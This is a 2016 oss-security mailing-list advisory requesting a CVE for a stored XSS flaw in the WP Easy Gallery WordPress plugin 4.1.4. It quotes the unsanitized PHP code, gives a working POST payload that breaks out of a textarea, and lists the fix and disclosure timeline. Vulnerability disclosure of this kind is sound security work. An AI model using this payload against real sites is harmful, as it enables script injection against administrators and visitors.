'[oss-security] CVE Request: WP Easy Gallery v4.1.4 Stored XSS Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE Request: WP Easy Gallery v4.1.4 Stored XSS Vulnerability
From:       Rahul Pratap Singh <techno.rps () gmail ! com>
Date:       2016-01-26 10:11:35
Message-ID: CADLX=aHvwog3Ss3sVQVhoi-F1A46a2X+w687MCJ+q-5Z_kBUSA () mail ! gmail ! com
[Download RAW message or body]


#Product    : WP Easy Gallery
#Version    : 4.1.4
#Home page Link  : https://wordpress.org/plugins/wp-easy-gallery

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"custom_style" parameter is not sanitized that leads to Stored XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpeg-settings.php

Found at line:12
$temp_defaults['custom_style'] = isset($_POST['custom_style']) ?
$_POST['custom_style'] : '';

Found at line:103
<td><textarea name="custom_style" id="custom_style" rows="4"
cols="40"><?php _e($default_options['custom_style']); ?></textarea></td>

----------------------------------------
Exploit:
----------------------------------------
POST /wp-admin/admin.php?page=wpeg-settings

wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns=abc&show_gallery_name \
=abc&gallery_name_alignment=abc&use_default_style=abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--&defaultSettings=xss&Submit=Save


----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/easy-gallery-settingsxsspoc.png

Fix:
Update to 4.1.5

Disclosure Timeline:
reported to wordpress  : 18/1/2016
wordpress response (plugin taken down) : 19/1/2016
vendor deployed a patch : 26/1/2016

#######################################
#        CTG SECURITY SOLUTIONS     #
#        www.ctgsecuritysolutions.com    #
#######################################

Pub ref:
https://0x62626262.wordpress.com/2016/01/26/wp-easy-gallery-v4-1-4-stored-xss-vulnerability/
https://wordpress.org/plugins/wp-easy-gallery/changelog/



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic